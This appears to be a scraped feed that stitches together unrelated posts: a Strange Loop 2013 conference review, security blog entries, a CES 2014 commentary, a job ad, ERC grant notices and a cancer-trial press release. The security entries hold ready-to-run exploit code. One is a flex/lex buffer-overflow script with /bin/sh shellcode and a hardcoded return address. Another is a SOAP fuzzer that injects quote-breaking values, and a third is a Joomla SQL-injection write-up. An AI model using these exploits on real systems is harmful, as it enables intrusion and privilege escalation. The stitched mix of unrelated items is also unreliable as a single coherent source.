  • Sarah Dutkiewicz - The History of Women in Technology. Sarah kicked off the afternoon with a keynote tour through some of the great innovations in technology, brought to us by women. She started with Ada Lovelace and her work with Charles Babbage on the difference engine, then looked at the team of women who worked on the ENIAC, several of whom went on to work on UNIVAC 1. Admiral Grace Hopper's work on Flow-Matic - part of the UNIVAC 1 project - and subsequent work on COBOL was highlighted next. Barbara Liskov (the L in SOLID) was also covered in depth, along with several others. These are good role models that we can use to encourage more diversity in our field - and to whom we all owe a debt of gratitude for going against the flow and marking their mark.
  • Evan Czaplicki - Functional Reactive Programming in Elm. This talk's description had caught my eye a while before the conference, enough so that I downloaded Elm and experimented with it, building it from source on both my Mac desktop and my Windows laptop, during the prerelease cycle of what became the 0.9 and 0.9.0.2 versions. Elm grew out of Evan's desire to express graphics and animation in a purely functional style and has become an interesting language for building highly interactive browser-based applications. Elm is strongly typed and heavily inspired by Haskell, with an excellent abstraction for values that change over time (such as mouse position, keyboard input, and time itself). After a very brief background to Elm, Evan live coded the physics and interaction for a Mario platform game with a lot of humor (in just 40 lines of Elm!). He also showed how code updates could be hot-swapped into the game while it was running. A great presentation and very entertaining!
  • Keith Adams - Taking PHP Seriously. Like CFML, PHP gets a lot of flak for being a hot mess of a language. Keith showed us that, whilst the criticisms are pretty much all true, PHP can make good programmers very productive and enable some of the world's most popular web software. Modern PHP has traits (borrowed from Scala), closures, generators / yield (inspired by Python and developed by Facebook). Facebook's high performance "HipHop VM" runs all of their PHP code and is open source and available to all. Facebook have also developed a gradual type checking system for PHP, called Hack, which is about to be made available as open source. It was very interesting to hear about the pros and cons of this old warhorse of a language from the people who are pushing it the furthest on the web.
  • Chiu-Ki Chan - Bust the Android Fragmentation Myth. Chiu-Ki was formerly a mobile app developer at Google and now runs her own company building mobile apps. She walked us through numerous best practices for creating a write-once, run-anywhere Android application, with a focus on various declarative techniques for dealing with the many screen sizes, layouts and resolutions that are out there. It was interesting to see a Java + XML approach that reminded me very much of Apache Flex (formerly Adobe Flex). At the end, someone asked her whether similar techniques could be applied to iOS app development and she observed that until very recently, all iOS devices had the same aspect ratio and same screen density so, with auto-layout functionality in iOS 6, it really wasn't much of an issue over in Apple-land.
  • Alissa Pajer - Category Theory: An Abstraction for Everything. In 2011, the joke was that we got category theory for breakfast in the opening keynote. This year I took it on by choice in the late afternoon of the first day! Alissa's talk was very interesting, using Scala's type system as one of the illustrations of categories, functors, and morphisms to show how we can use abstractions to apply knowledge of one type of problem to other problems that we might not recognize as being similar, without category theory. Like monads, this stuff is hard to internalize, and it can take many, many presentations, papers, and a lot of reading around the subject, but the abstractions are very powerful and, ultimately, useful.
  • Jen Myers - Making Software Development Make Sense For Everyone. Closing out day one was a keynote by Jen Myers, primarily known as a designer and front end developer, who strives to make the software process more approachable and more understandable for people. Her talk was a call for us all to help remove some of the mysticism around our work and encourage more people to get involved - as well as to encourage people in the software industry to grow and mature in how we interact. As she pointed out, we don't really want our industry to be viewed through the lens of movies like "The Social Network" which makes developers look like assholes!.
  • Martin Odersky - The Trouble with Types. The creator of Scala started day two by walking us through some of the commonly perceived pros and cons of both static typing and dynamic typing. He talked about what constitutes good design - discovered, rather than invented - and then presented his latest work on type systems: DOT and the Dotty programming language. This collapses some of the complexities of parameterized types (from functional programming) down onto a more object-oriented type system, with types as abstract members of classes. Compared to Scala (which has both functional and object-oriented types), this provides a substantial simplification without losing any of the expressiveness, and could be folded into "Scala.Next" if they can make it compatible enough. This would help remove one of the major complaints against Scala: the complexity of its type system!
  • Mridula Jayaraman - How Developers Treat Ovarian Cancer. I missed Ola Bini's talk on this topic at a previous conference so it was great to hear one of his teammates provide a case study on this fascinating project. ThoughtWorks worked with the Clearity Foundation and Annai Systems - a genomics startup - to help gather and analyze research data, and to automate the process of providing treatment recommendations for women with ovarian cancer. She went over the architecture of the system and (huge!) scale of the data, as well as many of the problems they faced with how "dirty" and unstructured the data was. They used JRuby for parsing the various input data and Clojure for their DSLs, interacting with graph databases, the recommendation engine and the back end of the web application they built.
  • Crista Lopes - Exercises in Style. Noting that art students are taught various styles of art, along with analysis of those styles, and the rules and guidelines (or constraints) of those styles, Crista observed that we have no similar framework for teaching programming styles. The Wikipedia article on programming style barely goes beyond code layout - despite referencing Kernighan's "Elements of Programming Style"! She is writing a book called "Exercises in Programming Style", due in Spring 2014 that should showcase 33 styles of programming. She then showed us a concordance program (word frequencies) in Python, written in nine different styles. The code walkthrough got a little rushed at the end but it was interesting to see the same problem solved in so many different ways. It should be a good book and it will be educational for many developers who've only been exposed to one "house" style in the company where they work.
  • Martha Girdler - The Javascript Interpreter, Interpreted. Martha walked us through the basics of variable lookups and execution contexts in JavaScript, explaining variable hoisting, scope lookup (in the absence of block scope) and the foibles of "this". It was a short and somewhat basic preso that many attendees had hoped would be much longer and more in depth. I think it was the only disappointing session I attended, and only because of the lack of more material.
  • David Pollak - Getting Pushy. David is the creator of the Lift web framework in Scala that takes a very thorough approach to security and network fallibility around browser/server communication. He covered that experience to set the scene for the work he is now doing in the Clojure community, developing a lightweight push-based web framework called Plugh that leverages several well-known Clojure libraries to provide a seamless, front-to-back solution in Clojure(Script), without callbacks (thanks to core.async). Key to his work is the way he has enabled serialization of core.async "channels" so that they can be sent over the wire between the client and the server. He also showed how he has enabled live evaluation of ClojureScript from the client - with a demo of a spreadsheet-like web app that you program in ClojureScript (which is round-tripped to the server to be compiled to JavaScript, which is then evaluated on the client!).
  • Leo Meyerovich - Thinking DSLs for Massive Visualization. I had actually planned to attend Samantha John's presentation on Hopscotch, a visual programming system used to teach children to program, but it was completely full! Leo's talk was in the main theater so there was still room in the balcony and it was an excellent talk, covering program synthesis and parallel execution of JavaScript (through a browser plugin that offloads execution of JavaScript to a specialized VM that runs on the GPU). The data visualization engine his team has built has a declarative DSL for layout, and uses program synthesis to generate parallel JS for layout, regex for data extraction, and SQL for data analysis. The performance of the system was three orders of magnitude faster than a traditional approach!
  • Chris Granger - Finding a Way Out. Some of you may have been following Chris's work on LightTable, an IDE that provides live code execution "in place" to give instant feedback as you develop software. If you're doing JavaScript, Python, or Clojure(Script), it's worth checking out. This talk was more inspirational that product-related (although he did show off a proof of concept of some of the ideas, toward the end). In thinking about "How do we make programming better?" he said there are three fundamental problems with programming today: it is unobservable, indirect, and incidentally complex. As an example, consider person.walk(), a fairly typical object-oriented construct, where it's impossible to see what is going on with data behind the scenes (what side effects does it have? which classes implement walk()?). We translate from the problem domain to symbols and add abstractions and indirections. We have to deal with infrastructure and manage the passage of time and the complexities of concurrency. He challenged us that programming is primarily about transforming data and posited a programming workflow where we can see our data and interactively transform it, capturing the process from end to end so we can replay it forwards and backwards, making it directly observable and only as complex as the transformation workflow itself. It's an interesting vision, and some people are starting to work on languages and tools that help move us in that direction - including Chris with LightTable and Evan with Elm's live code editor - but we have a long way to go to get out of the "tar pit".
  • Douglas Hofstadter, David Stutz, a brass quintet, actors, and aerialists - Strange Loops. The two-part finale to the conference began with the author of "Gödel, Escher, and Bach" and "I am a Strange Loop" talking about the concepts in his books, challenging our idea of perception and self and consciousness. After a thought-provoking dose of philosophy, David Stutz and his troope took to the stage to act out a circus-themed musical piece inspired by Hofstadter's works. In addition to the live quintet, Stutz used Emacs and Clojure to provide visual, musical, and programmatic accompaniment. It was a truly "Strange" performance but somehow very fitting for a conference that has a history of pushing the edges of our thinking!

Does anything unusual jump out at you from the above session listing? Think about the average technical conference you attend. Who are the speakers? Alex Miller and the team behind The Strange Loop made a special effort this year to reach out beyond the "straight white male" speaker community and solicit submissions from further afield. I had selected most of my schedule, based on topic descriptions, before it dawned on me just how many of the speakers were women: over half of the sessions I attended! Since I didn't recognize the vast majority of speaker names on the schedule - so many of them were from outside the specific technical community I inhabit - I wasn't really paying any attention to the names when I was reading the descriptions. The content was excellent, covering the broad spectrum I was expecting, based on my experience in 2011, with a lot of challenging and fascinating material, so the conference was a terrific success in that respect. That so many women in technology were represented on stage was an unexpected but very pleasant surprise and it should provide an inspiration to other technology conferences to reach beyond their normal pool of speakers too. I hope more conferences will follow suit and try to address the lack of diversity we seem to take for granted!

I already mentioned the great venues - both the hotel and the conference location - but I also want to call out the party organized at the St Louis City Museum for part of the overall "wonder" of the experience that was The Strange Loop 2013. The City Museum defies description. It is a work of industrial art, full of tunnels and climbing structures, with a surprise around every corner. Three local breweries provided good beer, and there was a delicious range of somewhat unusual hot snacks available (bacon-wrapped pineapple is genius - that and the mini pretzel bacon cheeseburgers were my two favorites). It was quiet enough on the upper floors to talk tech or chill out, while Moon Hooch entertained loudly downstairs, and the outdoor climbing structures provided physical entertainment for the adventurous with a head for heights (not me: my vertigo kept me on the first two stories!).

In summary then, the "must attend" conference of the year, as before! Kudos to Alex Miller and his team!


          Joomla CVE-2015-7857 writeup         
(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)



Few weeks ago Asaf Orpani found SQL injection vulnerability in 'latest' (in those days) Joomla CMS.
After CVE: vulnerable is version line from 3.2 to 3.4.

Because I was involved in other projects,  I found information about this CVE just few days ago... When I saw that Asaf published more details about possible exploitaton (then CVE), I was wondering
if I will be able to write small proof-of-concept code to use it later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:


„CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.”

Cool. ;]

I think that "all technical details"  you will find described at the SpiderLabs Blog so there is no point to copy/paste it here again.

What we will actually need is just one screen from Trustwave's Blog: one with GET request.
We can observe that 'for exploitation' we can create just a simple 'one liner' GET. We will use
python for this. ;)

Let's write a small web-client (GET request, based on urllib2 library).
Our goal is: type IP/hostname and click enter to get DB version. ;)

This case will be a little different than one described on SpiderLab's Blog, because we don't want to wait for admin to log-in. We don't need logged-in admin on webapp/server during our pentest. ;P

Our proof-of-concept payload, will use simple "version()"injected into SQL query,
when user will visit link with 'list[select]' parameter. On my localhost server we
will use LAMP (on Debian8) and Joomla 3.4.4.

By the way, it will be good to know if Joomla (found in our 'testing scope') is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and findout where we can find (if any) information
about the version:

$ grep  --color –nr –e 3.4.4 ./ 

Below you will find sample screen presenting strings containing 'version':



Now, we see a nice XML file containing version of Joomla installed on my box.
(It's good to mention here, that this file can be grabbed by anyone. You don't need
any credentials.)

So let's add few lines to our 'one liner' python script, to check if tested Joomla
is vulnerable or not. Sample code would look like this:
 
As you can see sqli(host) function is now commented out in the code. We only
want to see the version number. (Checking if you're Joomla installation got this file 
is left as an exercise for the reader.)

Joomla 3... SQL Injection
I tried this poc against 3.2, 3.3 and 3.4.4 installed on my box and to be honest, 
I was able to use it only against 3.4. (If you want - let me know in comments 
against which version installed on your box this poc worked. Thanks!;))


Modified version of this code is below:


Below is the screen of testing vulnerable Joomla 3.4.4 installed on my localhost.
Simple poc to get the version of MySQL available on the server:
 









          [EN] SOAP testing        
During one of last projects I needed to test some webservices.

I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in python...

And that's how I wrote soapee.py:



---<code>---

root@kali:~/code/soapee-v3# cat soapee3.py
#!/usr/bin/env python
# -------------------------------------
# soapee.py - SOAP fuzz - v0.2
# -------------------------------------
# 16.10.2015

import urllib2
import sys
import re
from bs4 import BeautifulSoup
import httplib
from urlparse import urlparse

target = sys.argv[1]


def sendNewReq(method):
  global soap_header
  print '[+] Sending new request to webapp...'
  toSend = open('./logs/clear-method-'+str(method)+'.txt','r').read()

  parsed = urlparse(target)
  server_addr = parsed.netloc
  service_action =  parsed.path

  body = toSend
  print '[+] Sending:'

  print '[+] Response:'

  headers = {"Content-type": "text/xml; charset=utf-8",
        "Accept": "text/plain",
        "SOAPAction" : '"' + str(soap_header) + '"'
        }

#  print '***********************************'
#  print 'headers: ', headers
#  print '***********************************'
  conn = httplib.HTTPConnection(server_addr)
  conn.request("POST", parsed.path, body, headers)
#  print body
  response = conn.getresponse()

  print '[+] Server said: ', response.status, response.reason
  data = response.read()

  logresp = open('./logs/resp-method-'+ method + '.txt','w')
  logresp.write(data)
  logresp.close()

  print '............start-resp...........................................'
  print data
  print '............stop-resp...........................................\n'


  print '[+] Finished. Next step...'
  print '[.] -----------------------------------------\n'

##

def prepareNewReq(method):
  print '[+] Preparing new request for method: '+str(method)

  fp = open('./logs/method-'+str(method)+'.txt','r')
  fp2 = open('./logs/fuzz-method-'+str(method)+'.txt','w')

  for line in fp:
    if line.find('SOAPAction') != -1:
      global soap_header
      soap_header = line
      soap_header = soap_header.split(" ")
      soap_header = soap_header[1].replace('"','')
      soap_header = soap_header.replace('\r\n','')
#     print soap_header

    newline = line.replace('<font class="value">','')
    newline2 = newline.replace('</font>','')

    newline3 = newline2.replace('string','";\'>')
    newline4 = newline3.replace('int','111111111*11111')
    newline5 = newline4.replace('length','1337')
    newline6 = newline5.replace('<soap:','<soap:')
    newline7 = newline6.replace('</soap:','</soap:')
    newline8 = newline7.replace(' or ','or')

    fp2.write(newline8)

  print '[+] New request prepared.'

  fp2.close()
  print '[+] Clearing file...'
  linez = open('./logs/fuzz-method-'+str(method)+'.txt').readlines()
  open('./logs/clear-method-'+str(method)+'.txt','w').writelines(linez[6:])


  fp.close()
  fp2.close()
  sendNewReq(method)

##


# compose_link(method), get it, and save new req to file
def compose_link(method):
  methodLink = target + '?op='+ method
  print '[+] Getting: ', method

  fp = open('./logs/method-'+str(method)+'.txt','w')

  req = urllib2.urlopen(methodLink)
  page = req.read()
  soup = BeautifulSoup(page)

  for pre in soup.find('pre'):
    fp.write(str(pre))

  print '[+] Method body is saved to file for future analysis.'
  fp.close()

  prepareNewReq(method)

##

## main
def main():
  print '        _________________'
  print '        (*(( soapee ))*)'
  print '             ^^^^^^\n'

  url1 = urllib2.urlopen(target)
  page1 = url1.readlines()

  # get_links_to_methods
  print '[+] Looking for methods:\n------------------------'
  for href in page1:
    hr = re.compile('<a href="(.*)\.asmx\?op=(.*?)">') #InfoExpert.asmx?op=GetBodyList">GetBodyList</a>')
    found = re.search(hr,href)
    if found: # at this stage we need to create working link for each found method
      method = found.group(2)

      # found method get as URL for pre content to next request
      compose_link(method)



  # ...
  #     ... get example of each req
  #           ... change each str/int to fuzzval
  #     ... send modified req
  print '---------------------------\ndone.'

##



try:
  main()

except IndexError, e:
  print 'usage: ' + str(sys.argv[1]) + ' http://link/to/WebService.asmx\n'

root@kali:~/code/soapee-v3#

---</code>---
Also@pastebin;)



As you can see it's just a proof of concept (mosty to find some useful information disclosure bugs) but the skeleton can be used to prepare more advanced tools.

Maybe you will find it useful.

Enjoy ;)





          [EN] Flex 2.5.33 (2) 0days        
I was testing some old bugs in one old distro, and that's how I found sigsegv in flex (2.5.33).

Below is the proof of concept:



---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#

from subprocess import call

flex = '/usr/bin/flex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"

payload = nops + shellcode + ret
call([flex,payload])

print 'Done\n\n'
---


Second one is pretty similar (this time for /usr/bin/lex binary):
---

#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#

from subprocess import call

lex = '/usr/bin/lex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"

payload = nops + shellcode + ret
call([lex,payload])

print 'Done\n\n'
---


Enjoy ;)


o/

          [EN] Analysing malicious PDF - part 2        
This time we will check 2 PDF's (because I decide that it will be more fun than just posting about one ;)). Beside that - those 2 files contains different method for delivering the payload, so we will check all of them.



To do:
1. find malicious file
2. find JS if there is any (or other object possible used for attack)
3. decode it - to get as much info as it's possible.
4. if not finished - go to step 2.

Two files to analyse you will find on mentioned before(1) Contagio's Blog.

First case:






Let's check object(s) contains JS:

PDF> object 7 > C:\1.txt 

...will save it to file. Open this file in your favorite editor and 'beauty' the code a little bit:


 Ok, so now we will get the idea...


Now we know how this code is obfuscated. Let's prepare "decoder" :)





Ok good, printable version should now contains decoded string. Checking:


hm... Almost good, but almost it's not enough ;) We need to rewrite this for() loop.

Better! Now we need to unescape() the code in a safe way. Change eval() to document.write() again:





And now we can see that this is (again commented ;) ) code with exploit for Adobe Acrobat.

Beauty again:





Good. Now after few minutes we can get the original exploit:



That's all for case one. :)


Second case:

New sample from Contagio's Blog, and again as a "first stage of checking"
we will use peepdf.py to analyse it:





Ok, now we can see some object(s) also containing JS code. Let's check JS this code:




In object 13 we will find more JS, so we need to extract it to TXT file again to beauty or analyse it later. Let's do it (PDF> object 13 > c:\yourFile.txt). Below is the screen from this action:




We can see that this code needs to be sanitized, so we will do it in Malzilla (unicode decoder in "Misc decoders"):




Malzilla again in action:



After decoding the rest in Burp's Decoder, we can find the real content of this exploit:




Checking online for resources like that, we can easily find proof of concept code, here or here for example.

After those 2 cases explained, you should now be able to check if your spam contains some "interesting" PDF files ;)

(* Remember ;)
if you can't check it, you can always send it to me: zipped with password 'infected'.)


Cheers ;)

o/








          Sr. Automation Tester - SPAR INFORMATION SYSTEMS - Bentonville, AR        
Experience in developing various proof of concepts on new technologies and work with SME’s to develop recommendations that align with Client strategy....
From Indeed - Fri, 21 Jul 2017 14:29:30 GMT - View all Bentonville, AR jobs
          The State of Technology 2014        
It's been a while since I've talked about technology. But with CES 2014 behind us, I think it's time to ruminate on a few things that we've learned over the last few years. I wouldn't compare myself to the greats Isaac Asimov, Arthur C. Clarke or Jerry Pournelle, but I think it's useful sometimes to look at the trends and see where we're going technology-wise.

I've given the reflections from this year's conference some time to trickle down into my brain, and here's what I've come up with.

Once upon a time, 3D TVs seemed to be all the rage. I think some people actually fell for that colossal joke. And for them, I'm sorry. I guess they were too young to remember the Red/Blue 3D from the 1980s.... In any case, there didn't seem to be any mention of this ludicrous attempt at making the movie-watching experience more immersive this year. Don't fret, though, there were plenty of other ridiculous technologies being touted at the show.

Wearables

The "Quantifiable Self" is a term I heard in reference to technology that has been "adapted" (the term seemingly used loosely) to be worn on the wrist, hip, etcetera. I can see the facility of fitness trackers and whatnot. There is a certain benefit to try and catalogue all of our physical activity (not just running and walking, but sleeping, etc.), but I think no one has really tied it up as yet. 

The Curve

Curved screens, most notably on large format displays (or TVs as we know them in everyday life) seemed to be the "3D" of this year's show. Quite honestly, as described I fail to see the utility of such a thing. I guess perhaps like a "sweet spot" for listening to audio, this is probably what they're trying to achieve. Unless it's to try and provide the wraparound IMAX sort of experience on a much smaller scale. There's even a TV, reportedly, which transforms from slightly curved to flat and vice versa at the touch of a button. Allegedly, it will cost around $80,000, so it's probably not going to be a widely adopted product and is more of a proof of concept that the insanely wealthy can waste money on. If you don't have one of those fancy transforming screens, though, and you have one of the fixed curve variety, anyone sitting to the side will see a distorted view, not to mention the effect is lessened the further away one gets (which is necessary as these TVs balloon to greater and greater sizes). In Urban Dictionary, there's a picture of this segment of CES 2014 under "Gimmick".

UHD

Or "4K" as it has become more commonly known (yes, there's also an 8K that doubles the size... take all those other statements and double 'em!). I think the resolution bumps along the road to "photorealism" (whatever that really means...) are inevitable, so it's good to see them. But, even more than the transition from "Standard Definition" to "High Definition" has been slight in some respects (Blu-Ray adoption hasn't exactly skyrocketed because of various factors), I predict that UHD will make even less of a noise. It's great, don't get me wrong, to increase the fidelity, but unfortunately it poses a problem in terms of marketing (will they call the Blu-Ray discs "UHD Blu-Ray" or will they have to come up with some other marketing term to help differentiate the difference?), but also because of the state of the Internet... with bandwidth caps, generally slower internet across America and some parts of the world, there just simply isn't the backbone to deliver the content, if and when it becomes more prolific. Maybe there will be great changes by the time UHD films, TV, etc. become more widely available, but I suspect with the recent Net Neutrality debacle going on in the USA, those changes will be a long time in coming. Physical media is becoming less and less relevant these days so I think this will really be the deciding factor upon the merits of a native UHD format.

Playstation Now

Formerly known as the On Live-like service Gaikai, this is Sony announcing they'll be streaming their back catalogue of PS3 era games to the PS4 (and other devices, including tablets). I think it requires conditions to be replicated which are not likely to happen in our less than ideal state of Internet in 2014, it is still a bold step on the part of a major corporation, and Sony should be applauded for trying to address all the angles for the PS4. I think it's really going to be a winner in 2014 and years to come. For now, I'm less enthusiastic about Playstation Now, but it will be interesting to see how the service evolves over the next few years. 

Steam Machines

So Valve announced their 12 or so hardware partners in making their Steam boxes. They're not really talking about their own, and I think everyone was expecting them to be the fourth horse in the console race. Everyone's still scratching their heads at what their ultimate aim is with the hardware partnerships (and their Beta program), but my guess is they're just tired of being shackled to Microsoft Windows and are doing what they can to espouse the idea that Steam can exist on many platforms. Bravo to them for defying expectation, but I think their communications have sent out something of a mixed message. Steam is a pioneering "middleware" platform, and I'm glad to see them making roads toward escaping the "Windows PC-only" moniker it currently enjoys. I know, it's on Mac as well (and Linux, obviously) but the repertoire of those platforms is emerging slowly, and it would be silly for them to just trade one closed platform for another... so a move like this makes sense in terms of the long view. I'm excited for Valve. They have made tremendous strides in developing their software platform, and as it stands, their name has become synonymous with gaming on a platform other than a console. Remember when they were just the "Half-Life" mod guys? Yeah, me neither.

Oculus Rift

To me, these guys were the champions of the show. Although I have yet to try one myself, the enthusiasm from people who have is palpable. And from a theoretic standpoint, I think this product is as close to market as anything that might want to progress the idea of a truly immersive experience. Because the technology aims are so well conceived (they're still executing on the paradigm), I think this will be a new era for the kind of wraparound, fully enclosed virtual experience we've all been dreaming of since we read Neuromancer. The latest Crystal Cove prototype ups the resolution and ads head tracking, and is reportedly a superior experience in most ways (owing to a method of displaying fresh data and fading out the display in nanoseconds when that data isn't truly live or fresh... which equates to a lessening of the nausea that some people have been experiencing when using the tech). I think it trivializes it to say this is the second coming of "VR," and I hesitate to even use that awful term in the same breath, but even without considering the application of something like this with today's graphics technology, it's extremely exciting to think about what the actual consumer product may be and what vistas it will open up for us in video games and entertainment.




So that's it, as far as a high-level perspective goes. It's really hard to distill a massive show like CES down to just a few statements, and most likely there will be obscure exhibitors at the show which have yet to be widely discovered, but I think it's worthwhile taking a bird's eye view of the whole thing (from the perspective of a potential user of these products). If you're looking for more, check out TheVerge's coverage.

          Résultats du 1er tour de l'appel ERC Proof of Concept 2017        

L'ERC a annoncé le 18 mai 2017 les noms des 51 lauréats retenus dans le cadre du premier tour de l'appel Proof of Concept 2017.


          Résultats de l'appel ERC Proof of Concept 2016        

Au total, 133 lauréats ERC ont été retenus pour financement dans le cadre de l'appel ERC Proof of Concept 2016, dans le but de mettre en valeur les résultats obtenus grâce à leur projet ERC.


          Why proof of concept projects are so worthwhile         
New post by Boagworld
          Pancultural-e - Fred Richardson        
itunes pic
This presentation will highlight the workshops and training sessions the Pancultural-e Project team have used to generate and store a pool of multimedia resources. And the workshops and training sessions aimed at re-using this material for a variety of ITC projects described briefly below. Basically we have: transformed a text based 'chalk and talk' Aboriginal Cultural Awareness Program into a rich multimedia content resource pool. We are now working to insert this content in our Learnscope deliverables: [1] A multilingual website platform used to conduct classroom based Aboriginal Awareness Programs, [with content also being 'spun-off' for use on our corporate website.] [2] Multilingual mp3 proof of concept audio podcasts [3] Multilingual mp4 proof of concept 'vodcasts' [4] mono lingual proof of concept vodcasts synchronised with real-time GPS capable hand held devices. For more information on this Project please go to http://ntlearnscope2007.wikispaces.com/IAD
          QualiTest US Wins Bid for Project with Leading Manhattan Healthcare Provider After Successfully Pitching Proof of Concept for ICD-10 Testing        

A leading academic healthcare provider in New York City recently signed with QualiTest to control their automated end-to-end ICD-10 testing support services across multiple locations and systems. Competing against half a dozen other testing companies, QualiTest was selected to perform the organization’s testing because of their innovative approach to ICD-10 testing.

(PRWeb October 03, 2013)

Read the full story at http://www.prweb.com/releases/2013/10/prweb11173873.htm


          Meduza (Jellyfish) - novi multiplatformski malware koji koristi GPU        
Tim programera je razvio rootkit koji koristi grafičku karticu umesto procesora kako bi ostao sakriven. Rootkit, kodnog imena "Meduza" (Jellyfish) je "proof of concept" implementacija koja pokazuje da je moguće pokretati malware direktno na GPU. Prema ovom timu, ovo predstavlja veću opasnost od standardnog malware zbog toga što, kako navode, "ne postoje alati koji analiziraju GPU malware".

Ovakvi rootkitovi bi mogli da imaju pristup primarnoj memoriji kroz DMA (direktni pristup memoriji) koji je dostupan najvećem broju uređaja. DMA, prema ovim navodima, zaobilazi CPU pa je ovakav malware teže detektovati. Što je najgore, malware ostaje u GPU memoriji i nakon gašenja računara.

Dok je originalna verzija koda bila objavljena za Linuks, tim iza "Meduze" je vrlo brzo objavio i verzije za Windows i Mac OS X. Tim je hteo da podigne svesnost o mogućnosti ovih napada i da skrene pažnju da siguronosna industrija još nije spremna za ovakav vid napada.

Developeri ovog rootkita, prema navodima, pokušavaju da objasne je da problem nije u operativnim sistemima ili GPU, već u današnjim siguronosnim alatkama koje nisu spremne za novu vrstu pretnji.

Više informacija možete naći na izvornim člancima u PC Worldu: "New Linux rootkit leverages graphics cards for stealth", "Stealthy Linux GPU malware can also hide in Windows PCs, maybe Macs"
          Demonstration of the Double Helix        
This is a proof of concept blog post. Please give it a try and let me know if it works for you! Double Helix from the Wolfram Demonstrations Project by Sándor Kabai
          The Xbox One Looks Like One Wonderful System--With Two Caveats        
A PlayStation fangirl admits it: Today's reveal of the Xbox One kind of blew the PlayStation 4 reveal out of the water. Even the name, Xbox One, rather than the casually monikered Xbox 720, is surprising and different. The PS4 reveal was centered on the games (and yes, the graphics capability of the PS4 seems superior). But the Xbox One focused on the integration of the Xbox with all of the media in your living room, making it "one" system. Obviously, a tech demo held at Microsoft's headquarters in Redmond is less proof and more proof of concept, but if the Xbox One is everything Microsoft claims, it looks like science fiction made reality.
          FDA Allows WIN Consortium to Proceed with Targeted Tri-Therapy Clinical Trial in First Line Treatment of Metastatic Non Small Cell Lung Cancer        

VILLEJUIF, France--(BUSINESS WIRE/AETOS Wire)-- WIN Consortium (WIN) received the US Food and Drug Administration (FDA)’s approval to start the clinical investigation of a novel therapeutic approach using a combination of three targeted therapies for the first line treatment of patients with advanced Non Small Cell Lung Cancer (NSCLC). The Survival Prolongation by Rationale Innovative Genomics (SPRING) trial will aim to enroll patients who are usually offered first line platinum-based chemotherapy. Patients with documented targetable driver alterations (EGFR mutations, ALK rearrangements, ROS1 and MET exon 14 skipping mutations) will be excluded. The population of NSCLC patients without actionable oncogenic driver mutations, envisioned for the enrollment in SPRING trial, represents the vast majority of patients with metastatic NSCLC (~80% in the Caucasian population).
With over 60% of NSCLC detected in an advanced or metastatic stage, and less than 5% of patients alive at 5 years, a paradigm changing strategy for treating the deadliest cancer is needed. WIN’s novel approach is based on the utilization of the tri-therapy combination of targeted drugs, following the historical success of this approach in AIDS and tuberculosis. Similarly, our concept relies on the association of three targeted drugs that used in combination are expected to be highly potent, whereas used alone in monotherapy they produce only modest clinical outcome.
‘’Nevertheless, it is important to acknowledge a significant difference between cancer and AIDS which lies in the higher biological complexity and heterogeneity of cancer compared to AIDS. In AIDS, one tri-therapy combination is effective for a majority of patients, whereas in cancer it is expected that many combinations will be needed to treat all patients effectively. WIN Consortium has developed new technologies for tailoring combinations for each individual patient.’’ said Dr. John Mendelsohn, Chairman of WIN. "WIN’s trial, entitled SPRING, is therefore a first proof of concept of this novel approach in the treatment of lung cancer, and will test as a first combination three drugs from WIN’s big pharma members, Merck’s Avelumab combined with Pfizer’s Palbociclib and Axitinib.’’ added Dr. Mendelsohn.
SPRING’s investigator initiated research will be led by Dr. Razelle Kurzrock (University of California San Diego, Moores Cancer Center) and co-led by Dr. Enriqueta Felip (Vall d'Hebron Institute of Oncology) and is planned to be launched in 5 countries and 8 WIN member sites: University of California San Diego Moores Cancer Center and Avera Cancer Institute (Dr. Benjamin Solomon), USA; Institut Curie (Dr. Nicolas Girard), Centre Léon Bérard (Dr. Pierre Saintigny) and Hôpital Paris Saint-Joseph (Dr. Eric Raymond), France; Vall d'Hebron Institute of Oncology, Spain; Centre Hospitalier de Luxembourg (Dr. Guy Berchem); and Chaim Sheba Medical Center (Dr. Jair Bar), Israel.
The SPRING trial will start with a Phase I portion to explore the safety of the combination and determine the optimal doses for the Phase II that will explore the efficacy of this tri-therapy regimen in first line treatment of metastatic NSCLC. The trial will also aim to validate a novel algorithm SIMS (Simplified Interventional Mapping System) developed by WIN and designed to match each patient’s tumor biology to a specific drug combination. For this purpose, both tumor and normal lung tissue biopsies will be obtained and explored in the SPRING trial. DNA and RNA analysis will be performed by Dr. Brandon Young at Avera WIN Precision Oncology Laboratory in San Marcos, California on biopsies using, respectively, Illumina NGS (next generation sequencing) and HTG Molecular’s expression (mRNA and microRNA) EdgeSeq technology used in conjuction with Illumina (NGS). Data integration for the SIMS algorithm will be performed by Ben-Gurion University of the Negev (Dr. Eitan Rubin), Israel.
‘’It is an unprecedented cooperation between our WIN members from academia, industry and research organizations.“ said Dr. Vladimir Lazar, WIN Chief Scientific and Operating Officer. ‘’Eight clinical sites will activate the study, drugs will be provided by Pfizer Inc., DNA and RNA analysis technologies by Illumina and HTG Molecular and pharmacovigilance by Covance. In particular, we are grateful to Foundation ARC on cancer research in France for financial support to initiate the SPRING trial. We are welcoming the support of any other organization or private donors, wishing to join this unique global effort dedicated to lung cancer patients.’’ added Dr. Lazar.
